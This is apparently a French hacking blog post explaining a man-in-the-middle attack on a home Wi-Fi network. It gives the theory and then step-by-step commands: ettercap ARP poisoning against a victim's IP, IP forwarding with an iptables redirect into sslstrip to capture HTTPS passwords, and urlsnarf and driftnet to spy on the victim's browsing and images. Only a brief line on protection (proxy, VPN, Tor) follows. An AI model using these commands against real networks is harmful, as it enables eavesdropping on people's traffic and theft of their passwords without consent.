hacktus0 - Mitm ou man in the middle attaque - wifi
hacktus0@destroyerpc:~$ echo access [denied]

Mitm

une attaque man in the middle (traduction : l'homme du milieu), c'est une attaque sniffing entre le pc est le routeur.


1.THEORIE


Alors nous allons changer le trajet d'une connection qui nous semble importante pour snif ou changer les pages web en intranet. Donc voici les connection de base tel que :
victime -------------\
		      =====>box
hacktus0 ------------/
changement des connections :
victime <-------hacktus0----------->box
En quel que sorte hacktus0 va servir de passerelle entre totes les connections de la box à la victime ou inversement.
Le petit incoveniants est que la connection serra três longue d'où l'intere d'avoir une bonne bande passante ou carte résau. le deuxieme inconvéniant est qu'il faut avoir l'acces à la box

2.PRATIQUE : ETTERCAP

voici nos IP :
victime = 192.168.0.5
hacktus0 = 192.168.0.2
box/passerel = 192.168.0.254
Donc nous allons commencer l'attaque avec ettercap :
ettercap -T -M arp:remote /192.168.0.5/ /192.168.0.254/ -i wlan0
Explication :
-T --text
-M --mitm
arp:remote type de requette
/IP/ precise l'ip ou alors // veut dire toutes les ip

3.PRATIQUE : IPTABLES

Donc nous allons commencer par redemarre l'os pour remettre les connection comme par defaut.
voici nos IP :
victime = 192.168.0.5
hacktus0 = 192.168.0.2
box/passerel = 192.168.0.254
ensuite entrer dans un terminal en mode root ceci :
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
iptables -L -t nat
sslstrip -l 1000
Explication :
iptables va modifier les chemin qui se connecte au resaux. Comme ici le port 80 de la victime sera rediriger au port 1000
le port 1000 est variable sur dautre port. j'utilise le port 1000 car il est le meme que se utilise certain trojan.
sslstrip permet recuperer les mots de passe de protocol https.

puis tappper dans un terminal toujours en mode root
ettercap -G
puis dans ettercap suiver ceci :
sniff > Unified sniffing... > wlan0
hosts >  scan for host
hosts > host list
ipbox > add to target 1
ip victime > add to target 2
target > current target
mitm > arp poising > sniff remote connections > OK
sniff > start sniff
Bonus :
urlsnarf -i wlan0 #vous pouvez recuperer toutes les urls de la victime.
driftnet -i wlan0 #permet de regarder les image que la victime consulte.


Protection :
utiliser : proxy,vpn. (fiable)
scanner les pc et connections sur votre AP.
pseudo :

email :

commentaire :

hacktus0

Pour lutter contre le mitm une solution existe c'est d'utiliser :
_utilisez un proxy ou tor